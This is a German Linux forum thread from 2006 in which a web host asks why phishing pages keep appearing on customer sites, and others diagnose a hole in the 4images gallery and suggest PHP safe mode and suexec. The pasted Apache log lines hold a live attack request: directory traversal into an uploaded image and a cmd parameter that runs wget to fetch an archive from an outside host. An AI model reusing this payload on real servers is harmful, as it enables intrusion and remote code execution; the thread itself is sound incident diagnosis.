Hinweis: Das Forum wird geschlossen! Neue Registrierungen sind nicht mehr möglich!

 Zurück zu Pro-Linux   Foren-Übersicht   FAQ     Suchen    Mitgliederliste
Apache Sicherheit -> Phishing Seiten

 
Neuen Beitrag schreiben   Auf Beitrag antworten    Pro-Linux Foren-Übersicht -> Sicherheit
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
vayia



Anmeldungsdatum: 01.09.2006
Beiträge: 4
Wohnort: Winterthur

BeitragVerfasst am: 01. Sep 2006 14:24   Titel: Apache Sicherheit -> Phishing Seiten

Hallo zusammen,

Ich hab ne Frage zum Apache Server.

Jede virtuelle Domain hat einen eigenen Benutzer und eine eigene Gruppe,
dieser hat auch Schreibrechte, ab und zu taucht nun eine Phishingseite auf diesen Seiten auf, die wohl per HTTP Post raufgeladen wurden.

Die Rechte brauchts leider für die ver. CMS die von den Kunden installiert werden.
Hat da jemand ne Idee?

Gruss Pascal
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen MSN Messenger

klopskuchen
prolinux-forum-admin


Anmeldungsdatum: 26.06.2004
Beiträge: 1444

BeitragVerfasst am: 01. Sep 2006 15:08   Titel:

Zitat:
die wohl per HTTP Post raufgeladen wurden.

Meinst du nicht 'PUT'?
Wenn doch 'POST', werden die übermittelten Daten unreichend validiert. Zeig mal ein paar Einträge solcher uploads aus der access.conf.

MfG, Klopskuchen
_________________
When all else fails, read the instructions .
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen

vayia



Anmeldungsdatum: 01.09.2006
Beiträge: 4
Wohnort: Winterthur

BeitragVerfasst am: 01. Sep 2006 15:12   Titel:

So was:

Zitat:
81.24.26.57 - - [31/Aug/2006:23:52:00 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=wget%20-o%20../ama.tar%20nusunteu.xhost.ro/am
a.tar;ls%20../ama.tar HTTP/1.1" 200 644 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:27 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=cd%20..;tar%20xvf%20ama.tar HTTP/1.1" 200 633
"-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:37 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=ls%20ama.tar HTTP/1.1" 200 641 "-" "Mozilla/5
.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:43 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=tar%20xvf%20ama.tar HTTP/1.1" 200 1622 "-" "M
ozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"


ich denke das liegt wohl am cms von diesem kunden?

edit:: ist wohl so ein php gallery tool...
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen MSN Messenger

klopskuchen
prolinux-forum-admin


Anmeldungsdatum: 26.06.2004
Beiträge: 1444

BeitragVerfasst am: 01. Sep 2006 15:28   Titel:

Zitat:
../../[...]&cmd=wget...

- Ist das Ausführen beliebiger Kommandos vorgesehen?
- Ist das directory-traversal vorgesehen? (Hast du rumänische Kunden? Smile )
- Was ist das für Software?


MfG, Klopskuchen
_________________
When all else fails, read the instructions .
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen

vayia



Anmeldungsdatum: 01.09.2006
Beiträge: 4
Wohnort: Winterthur

BeitragVerfasst am: 01. Sep 2006 15:35   Titel:

Hallo,

Ich denke das ist ne Sicherheitslücke,

http://www.4homepages.de/forum/index.php?topic=11855.0

muss ich wohl updaten. Aber ist halt schwierig. Ich kann ja nicht alle Kundendomains überwachen... Und die können installieren was Sie wollen....

Wie handhabt ihr das so?
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen MSN Messenger

klopskuchen
prolinux-forum-admin


Anmeldungsdatum: 26.06.2004
Beiträge: 1444

BeitragVerfasst am: 01. Sep 2006 16:00   Titel:

Zitat:
Und die können installieren was Sie wollen

Wenn eine Kunde kaputte Software fährt und sein Kram zerstört wird, hat er Pech gehabt. Du solltest Kunden voreinander schützen. Und deinen Server vorm Kunden. Solange jemand nur sein eigenes Verzeichnis zerschießt, naja wen juckts, daß ist sein Bier.


MfG, Klopskuchen
_________________
When all else fails, read the instructions .
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen

vayia



Anmeldungsdatum: 01.09.2006
Beiträge: 4
Wohnort: Winterthur

BeitragVerfasst am: 03. Sep 2006 15:31   Titel:

Was kann man denn da überprüfen?

Meine Systeme sind Debian Sarge 3.1 und als Verwaltungstool setze ich VHCS ein.
Die System wurden nach VHCS HowTO's erstellt.

Dieser macht virtuelle Hosts in der Apachekonf. Mehr ist da aber glaubs nicht drin.
Kann man die einzelnen Seiten irgendwie von einander schützen?

Die Phishing-Dateien gehören dann der Gruppe www-data.
Jede Domain hat eigentlich eine Gruppe und einen Benutzer mit dem gleichem Namen,
aber der www-data hat da trotzdem Rechte (apache-user?).

Falls jemand n gutes Howto hat würd ich das gerne mal durchchecken.

Danke
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen MSN Messenger

klopskuchen
prolinux-forum-admin


Anmeldungsdatum: 26.06.2004
Beiträge: 1444

BeitragVerfasst am: 09. Sep 2006 16:12   Titel:

http://www.php-faq.de/q/q-konfiguration-safe-mode.html
Im Idealfall mod-cgi und su-exec. Ist allerdings etwas langsamer in der Ausführung, weshalb gerade Massenhoster mod-php bevorzugen um mehr Kunden auf eine Kiste klatschen zu können.


MfG, Klopskuchen
_________________
When all else fails, read the instructions .
 
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen

Beiträge vom vorherigen Thema anzeigen:   
     Pro-Linux Foren-Übersicht -> Sicherheit Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 1

 
Gehen Sie zu:  

Powered by phpBB © phpBB Group
pro_linux Theme © 2004 by Mandaxy